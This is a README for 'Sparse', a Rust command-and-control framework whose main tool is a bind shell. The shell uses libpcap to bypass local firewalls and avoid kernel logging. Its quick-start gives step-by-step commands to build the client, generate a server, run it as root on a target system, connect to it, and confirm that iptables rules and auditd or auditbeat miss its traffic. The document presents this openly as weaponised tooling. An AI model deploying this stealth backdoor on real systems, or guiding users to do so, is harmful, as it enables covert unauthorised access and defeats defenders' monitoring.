# Sparse: A Rust C2 framework

Developed using libpcap to enable evading local firewalls and with an eye towards hiding itself from inspection. Deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is `sparse-05`.

This repository weaponizes some of the concepts highlighted in [this blog post](https://andrew.riouxs.co/articles/20251017-direct-network-access.html)

## Significant Packages
- [pcap-sys](./pcap-sys): A Rust wrapper around the libpcap library for Linux
- [nl-sys](./nl-sys): A Rust wrapper around the netlink (nl) library on Linux
- [sparse-05](./sparse-05/README.md): A bind shell utility to create bind shells on target servers and connect to them

## Development

This environment is designed to be developed in with a Nix developer shell, obtained with `nix develop`

## Bind shell

The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md).

### Quick start:

- Install the Nix package manager on a Linux system: [https://nixos.org/download/]
- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client`
- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name`
- Copy to and run on a target system as root
- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248`
- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate
- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel